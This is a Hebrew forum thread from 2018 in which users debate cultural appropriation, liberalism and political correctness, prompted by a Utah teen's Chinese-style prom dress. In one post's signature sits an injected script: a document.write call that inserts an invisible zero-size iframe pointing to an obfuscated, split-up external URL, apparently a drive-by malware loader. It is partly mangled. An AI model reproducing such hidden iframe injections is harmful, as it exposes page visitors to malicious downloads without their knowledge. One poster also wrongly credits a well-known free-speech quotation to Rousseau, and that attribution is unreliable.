בית פורומים עצור כאן חושבים

השמלה הסינית, הקידה הסינית ורגישות יתר תרבותית

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-1/5/2018 08:03 לינק ישיר 
השמלה הסינית, הקידה הסינית ורגישות יתר תרבותית

מעשה בנערה בת 18 ממדינת יוטה שהתכוננה לטכס המעבר המפורסם של התרבות בארצה, הלא הוא ה"פרום" הידוע. זמן מה לפני כן היתה באיזו חנות ושם ראתה בגד נפלא ביותר.

"ראיתי את השמלה כי חשבתי שהיא יפהפיה והערצתי את היופי של התרבות הזו", הסבירה לאחר זמן לINSIDER

אה, שכחתי. קוראים לה Keziah Daum . את הסיפור הזה אפשר לקרוא, בין השאר, כאן

http://www.foxnews.com/lifestyle/2018/04/30/utah-teen-shamed-for-wearing-racist-dress-to-prom-sparking-cultural-appropriation-debate.html

אין שם תמונה של הנערה עם השמלה (ואולי עדיף שלא?) אבל כן כתוב שזו היתה שמלה כתומה אדומה.

לא רק שהיא לבשה את השמלה אלא שהיא ביצעה איתה איזו קידה סינית מסורתית, הצטלמה בתנוחה הזו, ופירסמה אותה (בטוויטר?).

ואז הגיעו התגובות. באלפיהן.

מתברר שקזיה פגעה בהמון רגשות סיניים או אחרים וניכסה לעצמה תרבות שאינה שלה, ולכן היא "גזענית בארון". אסור היה לה כנראה לקנות את השמלה, ללבוש אותה, להצטלם איתה ולפרסם אותה. זה לא שלה.

היו גם שתמכו בה, כמובן, וכן דעתי נוטה.

מדוע אני מביא את כל הסיפור המוזר הזה? מפני שזו דוגמא למה שמכנים היום "הכפיה הליברלית", וגם "רגישות יתר תרבותית". אם הסינים המציאו את השמלה הזו, אז מי שתלבש אותה גוזלת את התרבות הסינית העתיקה. היא מתחזה למה שהיא לא. אם היא מפרסמת את זה אז היא גזענית (?) חבויה.

ובכן:

מדוע זו גזענות ללבוש משהו שיפה בעיני? איך מגיעים מבחירת בגד להצהרה גזענית נגד תרבות, במיוחד כאשר הבחירה אינה מבקרת את הלבוש הסיני אלא חולקת מה שנקרא "המחמאה הכנה ביותר" כלומר חיקוי? (אימרה ידועה ולא מצאתי את בעליה בגוגל).

איני טוען שאי אפשר להבין את הגישה של המבקרים. דווקא כן. אבל הבנה זו מראה שהם, לדעתי כמובן, "משתגעים שגעון ארוך" כלשון הרמב"ם. הפרשנות שלהם למה שקזיה הנ"ל חושבת ומרגישה ומבטאת בהתנהגותה לא רק שגויה, לדעתי, אלא גם מבוססת על הנחות יסוד תרבותיות שגויות. הפגיעות (מלשון של להיות פגיע) היא סוג של רגישות יתר שמתקבל רושם שמחנכים לקראתה, באמריקה, אולי בישראל, אולי בכל מקום שיד הליברליזם הדורסני מגיעה.

האם מקומו של הסיפור הקטן הזה כאן אצלנו בפורום? ובכן... אולי אני מרשה לעצמי יותר מדי, אבל זו תופעה אחת מני רבות, שמצטרפת לקו, לגישה. גישה ממש לא בריאה (וכמובן צריך להסביר מדוע, אלא שהסבר כזה יהיה ארוך למדי).

אם מישהו מכין אוסף של סיפורים על רגישות יתר תרבותית ועל ליברליזם דורסני, אז הנה התרומה שלי לאוסף.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דווח על תוכן פוגעני

נשלח ב-1/5/2018 09:55 לינק ישיר 

.

ברוך הבא לעולם הניכוס התרבותי.

דדווח על תוכן פוגעני

נשלח ב-1/5/2018 10:17 לינק ישיר 

הרב מימוני. תודה על העלת הנושא של הדורסנות הליברלית. התפתחותה תוביל בהכרח לדורסנות הקומוניסטית והשלכותיה ואולי אפילו יותר.

דדווח על תוכן פוגעני

נשלח ב-1/5/2018 12:38 לינק ישיר 

מואדיב

לא ידעתי ועכשו למדתי.

אמנם כאשר מביאים לינק צריך לציין מה יש בו.

הארץ רק למנויים. מה שאני יכול לראות זה

האשמה בניכוס תרבותי היא גרסה חילונית להאשמה בכפירה

לפני 70 שנה סירבו תחנות רדיו גזעניות להשמיע מוזיקה שחורה לקהל לבן. כיום, פעילים אנטי גזעניים קוראים לאסור על ציירים לבנים לתאר נושאים שחורים. כתב הגנה על הניכוס התרבותי

http://schema.org/Person" itemprop="author">קינאן מאליק
ניו יורק טיימס

הציור של דיינה שוץ ובו גופתו של אֶמֶט טיל. עורר מחלוקתAlina Heineke/אי־פי

טוב שאני כותב ולא עורך. אילו הייתי עובד כעורך של עיתון או מגזין, סביר להניח שבקרוב הייתי מפוטר, כי המאמר שלהלן יוצא להגנת הניכוס התרבותי. בחודש שעבר, בקנדה, איבדו שלושה עורכים את משרותיהם לאחר שהביעו עמדה דומה. המחלוקת התעוררה כשהאל נידְזְוְויֶיסְקי, עורך "Write", המגזין של איגוד הכותבים הקנדים, כתב מאמר מערכת והגן בו על זכותם של כותבים לבנים ליצור דמויות בנות מיעוטים או דמויות של ילידים. בתוך ימים ספורים הוא נאלץ להתפטר בעקבות הסערה שקמה ברשתות החברתיות. איגוד הכותבים פירסם התנצלות

אמנם יתכן שאפשר למצוא את המאמר המקורי בניו יורק טיימס.

ה"מאקו" לא עובד אצלי ומוביל לשגיאה של "לא נמצא".

דדווח על תוכן פוגעני

נשלח ב-1/5/2018 12:41 לינק ישיר 

לעצם הנושא, הוא חדש עבורי. ראיתי בו חלק ממה שכיניתי (ומסתבר שכבר ראיתי את שימוש הלשון הזה) "ליברליזם דורסני". עכשו מתברר מדבריכם, מואדיב וירוחם, שזו כבר תופעה שיש לה שם משלה...

אמנם קשה להבין את זה. האם ההנחה היא שיש זכויות יוצרים לאומיות?

אכן בתגובות לסיפור של קזיה יש מי שכתב נגד התוקפים והמבקרים על הגניבה התרבותית: למה אתם משתמשים באינטרנט כאשר זו המצאה מערבית? (היה ויכוח אם זה בריטי או אמריקני).

האם הזכויות האלו הן על סמלים או גם על רעיונות, פטנטים, טכנולוגיה עתיקה (גלגל, אש) וחדשה (אינטרנט), או אפילו על משהו כמו שימוש בשפה? האם מותר לי להשתמש באנגלית או בעברית? (באמת, יש כאלו מן החרדים הקיצוניים שנמנעים מלהשתמש בשפה של אליעזר בן יהודה. אולי הם אלו שגילו את הניכוס התרבותי ונזהרו ממנו? סמיילי).

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 12:29 לינק ישיר 

שוב הגמל לא רואה את דבשתו.

הניכוס התרבותי לא נובע מליברליזם אלא להפך  
מדובר פה על ביצור חומות. כל מי שפורץ את החומות נחשב כופר. 

מעמד קדוש

הצורה החזקה ביותר של ביצור החומות היא הדת. כשאמונות מסוימות נחשבות למקודשות, מציבים אותן מעבר לספק. פקפוק באמונות האלה נחשב לכפירה. ההאשמה בניכוס תרבותי היא גרסה חילונית להאשמה בכפירה. זו ההתעקשות שאמונות ודימויים מסוימים הם חשובים לתרבויות מסוימות עד כדי כך שאין להרשות לאחרים לנכס אותם. ההאשמה הזאת עולה בבירור באופן הבולט ביותר בפולמוס על הציור " Casket" של שוץ.....

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 14:57 לינק ישיר 

ועל כך הדיון. הליברליות הפכה. לליברליזם. כלומר הפכה לדת. לדת אלימה ביותר ולא סובלנית בצורה קיצונית. וזה להפך מעיקרי הדת שלה הסובלנות כלפי דתות אחרות. הדת היהודית והמוסלמית. הסובלנות אינן מעיקרי הדת.

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 16:29 לינק ישיר 

אתה מערבב בין שני נושאים וגם טועה לגבי שניהם.

הנושא של הפוסט הוא ניכוס תרבותי. 
 האם ניכוס תרבותי נובע מליברליות יתר ? לא. ניכוס תרבותי נובע מפוליטיקה של זהויות שאינה נובעת מליברליות יתרה אלא להפך  שהרי ליברליות דוגלת בחופש הפרט וניכוס תרבות מהווה אנטיתזה לחופש הפרט .( וכידוע גם הדת לא נותנת חופש לפרט לנהוג כרצונו ולכן מי שצוחק על התגובות של הסינים לשמלה הסינית שלבשה האמריקאית מיוטה שיסתכל קודם כל בפרצופו  הניבט אליו במראה .)

נושא שני שהעלית (שכאמור אינו קשור בכלל לנושא האשכול ) הוא הסובלנות בליברליות.

ניקח את עיקרון חופש הביטוי לדוגמה 

חופש הביטוי הוא רעיון ליברלי חשוב אבל אין זאת אומרת  שאתה יכול לצעוק : "אש" בתוך אולם קולנוע צפוף. כלומר גם לעיקרון של חופש הביטוי יש גבולות הגיוניים. .
כך גם  לליברליות  יש הגבלות משלה ולכן זאת טעות חמורה לומר שליברליות וסובלנות הולכות תמיד תמיד ביחד. 

תוקן על ידי אפריםבן ב- 02/05/2018 16:30:39

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 18:20 לינק ישיר 

אפרים

תודה על הרצון הטוב. איני מצליח בינתים לקשר בין מה שכתבת אתה למה שכתבתי אני ושמא זה בגלל שלא הסברתי עצמי היטב. אבהיר: כאשר קראתי את הסיפור הקטנטן והמשעשע הזה בעיני וחשבתי להביאו הלום, לא הייתי מודע לתפוצה הרבה של התופעה הזו. כלומר, לא התופעה של ניכוס תרבותי אלא התופעה של הכרזה על המונח הזה והצגתו כעבירה חמורה (לא ברור על אלו כללים). חשבתי לתומי שזה משעשע ושגיליתי את אמריקה ואשתף בכך את חברי ורעי כאן.

אנסה שוב.

א. מעשה בנערה אמריקאית שבחרה לה שמלה יפה מתרבות אחרת עבור טכס מעבר. היא לבשה את השמלה-גלימה, צילמה את עצמה, ביצעה איזו קידה מהסוג הסיני עם הגלימה, ואפילו פירסמה זאת בטוויטר שלה.

ב. היות שהיא אמריקאית (אולי אפילו יהודיה? עם שם כמו דאום?) ולא סינית, הועלתה נגדה הטענה שהיא גזלה באיזה אופן את התרבות הסינית ואת הנציגים הלגיטימיים שלה (כך הבנתי). מעשה הגזילה הזה נקרא "ניכוס תרבותי".

ג. "ניכוס" במובן שאני לוקח לעצמי משהו שאינו שלי, שלא עמלתי עליו, ואני מציג זאת כאילו זה היה שלי ואולי אפילו פרי יצירתי.

"תרבותי" כי הניכוס אינו של דבר שבממון אלא של רעיון או סמל מתחום שמזוהה אצלנו כ"תרבות".

ד. לדעתי זוהי רגישות יתר למותר ואסור בצורות התנהגות אנושיות, תוך חלוקת העולם לתרבויות, ותביעה לאסור על מי שאינו בן תרבות מסויימת לאמץ לו סמלים וטכסים מתוכה.

קשה לי מאד להבין איך אפשר להשתית ולהצדיק טענות כאלו. גם השימוש שלי במונח "גזל" בסעיף הקודם אינו בא להצדיק את השימוש המוזר הזה בעיני אלא לצטט.

ה. קישרתי בין רגישות היתר הזו לבין הנטיה למה שאפשר לכנות "ליברליות יתר". הליברליות המוגזמת הזו הופכת לדורסנית, בכך שבשם הליברליות וזכויות האדם והדמוקרטיה מתחוללים מעשי כפיה.

יש לכך דוגמאות שונות, שהן מצחיקות אבל יותר מכך מסוכנות. כך היא משטרת המחשבות שלפי מאמרים מסויימים (של אלו שמשתייכים לצד השני של המפה התרבותית, כלומר ימין ושמרנים דתיים). כך האיסור להתייחס למגדר כתכונה פיזיקלית וביולוגית ועוד ועוד.

באשר למה שכתבת אתה -

הניכוס התרבותי, אם יש תופעה כזו או תופעה שאפשר לכנותה כך, אינה נובעת מן הליברליות הקיצונית שהזכרתי בסעיף ה. מה שאני טוען הוא שהעיסוק בכתבי אישום נגד אלו שנאשמים בניכוס תרבותי, העיסוק הזה הוא חלק מן הליברליות הדורסנית. בדוגמא של קזיה, לקחת את בחירתה בשמלה מתרבות זרה כנושא לביקורת הוא השימוש באשמה של "ניכוס תרבותי" במקום שאין כזה דבר - עד שממציאים אותו. (האם אפשר להשתמש במונח שהמצאתי? שמישהו המציא? ודאי שכן. אין בעלות מילונית. השאלה היא אם יש תוכן משמעותי ולא פסול להתעסקות כזו).

אשר לחופש הביטוי, אני ודאי מסכים לכל מה שכתבת על השימוש המסוכן בפירסום ובמילים. אולם הליברליזם הדורסני אפשר שהתפתח מתוך הליברליזם, אבל הוא שונה ממנו לרעה.

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 18:23 לינק ישיר 

ירוחמ הציג עמדה דומה לשלי אם כי עשה זאת בצורה קיצונית למדי תוך השוואת הגישה הליברלית דורסנית לדת בחוסר הסובלנות שלה. תודה לו.

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 19:41 לינק ישיר 

מיימוני ,הרי הליברליות דוגלת בחופש הפרט. הסיפור שהבאת נוגד בפירוש את עיקרון חופש הפרט (ללבוש מה שהוא רוצה.) אז איך אתה יכול לטעון שזה נובע מליברליות? 

דדווח על תוכן פוגעני

נשלח ב-2/5/2018 22:58 לינק ישיר 

אפרים

יפה שאלת. לכן כתבתי "ליברליות דורסנית". זו הקצנה בליברליזם, ובהחלט אפשר לטעון שזה כבר חרג מן העקרון היסודי של זכות הפרט למה שירצה כל עוד אינו פוגע בזולתו. הבעיה, עד כמה שייראה לי, היא הרחבה עצומה של "פוגע בזולת".

מתייחס לאשה בתור אשה, למשל, זו פגיעה על רקע מגדרי.

חושב על מישהו משהו לא טוב - זו עבירה של פגיעה, למרות שמאומה מזה לא יצא מפיו.

להשתמש בלבוש מסורתי של תרבות אחרת - זו גזילה תרבותית.

ועוד ועוד.

אם כן אפשר שזו התשובה לשאלתך, וסייעת בשאלה זו להסביר ולהגדיר מה בין ליברליזם דורסני לבין ליברליזם מיסודו של מיל, למשל. הרחבה של "פגיעה בזולת".

דדווח על תוכן פוגעני

נשלח ב-3/5/2018 11:35 לינק ישיר 

אביה הרוחני של הליברליזם הוא זאן זאק רוסו- והוא כותב כמצווה הראשונה "אינני מסכים למילה מדברייך אך אהיה מוכן להיהרג על זכותך לומר אותם ." בא נבדוק היום את האמירה הזו עד כמה היא מיושמת אצל הליברלים. בכל מקום שהם מפסידים בבחירות. מלחמות אש וגפרית. מספיק לראות את בטאון הליברליזם הארץ" איך מתיחסים לדעות אחרות.

דדווח על תוכן פוגעני

נשלח ב-3/5/2018 14:40 לינק ישיר 

מיימוני כתב:
אפרים

יפה שאלת. לכן כתבתי "ליברליות דורסנית". זו הקצנה בליברליזם, ובהחלט אפשר לטעון שזה כבר חרג מן העקרון היסודי של זכות הפרט למה שירצה כל עוד אינו פוגע בזולתו. הבעיה, עד כמה שייראה לי, היא הרחבה עצומה של "פוגע בזולת".

מתייחס לאשה בתור אשה, למשל, זו פגיעה על רקע מגדרי.

חושב על מישהו משהו לא טוב - זו עבירה של פגיעה, למרות שמאומה מזה לא יצא מפיו.

להשתמש בלבוש מסורתי של תרבות אחרת - זו גזילה תרבותית.

ועוד ועוד.

אם כן אפשר שזו התשובה לשאלתך, וסייעת בשאלה זו להסביר ולהגדיר מה בין ליברליזם דורסני לבין ליברליזם מיסודו של מיל, למשל. הרחבה של "פגיעה בזולת".

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

מיימוני,תופעת ה"ניכוס התרבותי" לא נובעת מליברליות דורסנית אלא מתופעת ה"פוליטיקלי קורקט " שנובע מדעות מרקסיסטיות שהשתבשו ולא מליברליות יתר. תקרא קצת יותר על ההיסטוריה של הרעיונות.

מה פשר "פוליטיקלי קורקט"?

על הקמפיין של דונלד טראמפ הדגים נאמר שהוא העמיד בסימן שאלה ואף שבר המון מוסכמות וכללים בפוליטיקה והחברה האמריקאית. כשניצח טראמפ אמרו מומחים רבים שתם עידן הפוליטיקלי קורקט.

אבל מה זה פוליטיקלי קורקט?

פוליטיקלי קורקט (Politically correct), בעברית "תקינות פוליטית" (Political correctness), הוא שם של גישה שבה נמנעים משימוש בביטויים מפלים ומעליבים, כלפי אוכלוסיות בחברה. המושג הוא אמריקאי, שכן ההבדלים בין בני אדם בחברה האמריקאית בוטאו בעבר לא פעם במילים פוגעניות ומעליבות, או כפי שמדעני חברה יכנו זאת "מילים שאינן תקינות פוליטית".

כמובן שהנוהג הזה זכה למקבילים גם במדינות אחרות, מעט גם בישראל.

במסגרת התקינות הפוליטית, הפוליטיקלי קורקטנס, נוהגים לכתוב ולהשתמש בתקשורת בביטויים שאינם פוגעניים, במקום במילים מעליבות. "אפרו-אמריקאי" החליף את "כושי" ואת "ניגר" המעליבים. אפילו באקדמיה ואפילו לא כדי לציין אמירה שלילית ופוגענית של אחר, לא נוהגים לומר את כינוי הגנאי nigger. במקומו נהוג לומר "The N word" וכולם יודעים מהי המילה. זה כל כך מושרש באמריקה, עד כדי כך שבתחנות רדיו וטלוויזיה בארצות הברית לא נוהגים גם להציג שירים, מחזות או טקסטים שבהם משובצים ביטויים שאינן תקינים פוליטית, אפילו אם הם נאמרים במחאה וכנגד.
כך למשל לא ישודרו ברדיו שירים כמו "אישה היא הכושי של העולם" (Woman Is the Nigger of the World), שכתב ג'ון לנון, זאת על אף שכוונתו הייתה דווקא למחות נגד היחס לנשים בהיסטוריה ועל השובניזם הגברי הנהוג בעולם. באופן דומה החליף הביטוי "אמריקאים-ילידים" במקום "אינדיאנים". מבוגרים מכונים בארצות הברית "מבוגרים" או "קשישים" ולא "זקנים". נשים מתקדמות אומרות "בן זוגי" במקום "בעלי". מי שפעם כונו בכינוי המעליב "מפגרים" הם היום "מאותגרים שכלית" וכך הלאה. "

דדווח על תוכן פוגעני

נשלח ב-3/5/2018 14:45 לינק ישיר 

מיימוני המאמר במאקו על הניכוס התרבותי שנובע מתופעת התקינות הפוליטית מבהיר היטב לאן הידרדרה התקינות הפוליטית. (הדרך לגהינום רצופה בכוונות טובות ....)
 הלינק לא עובד  אבל ניתן להקיש בגוגל : "ניכוס תרבותי" והמאמר במאקו יופיע ראשון. 

תוקן על ידי אפריםבן ב- 03/05/2018 14:52:44

דדווח על תוכן פוגעני

נשלח ב-3/5/2018 14:55 לינק ישיר 

ירוחםשמ כתב:
אביה הרוחני של הליברליזם הוא זאן זאק רוסו- והוא כותב כמצווה הראשונה "אינני מסכים למילה מדברייך אך אהיה מוכן להיהרג על זכותך לומר אותם ." בא נבדוק היום את האמירה הזו עד כמה היא מיושמת אצל הליברלים. בכל מקום שהם מפסידים בבחירות. מלחמות אש וגפרית. מספיק לראות את בטאון הליברליזם הארץ" איך מתיחסים לדעות אחרות.

ומה זה שייך לתופעת הניכוס התרבותי ?

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > השמלה הסינית, הקידה הסינית ורגישות יתר תרבותית
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 לדף הבא סך הכל 2 דפים.

bholext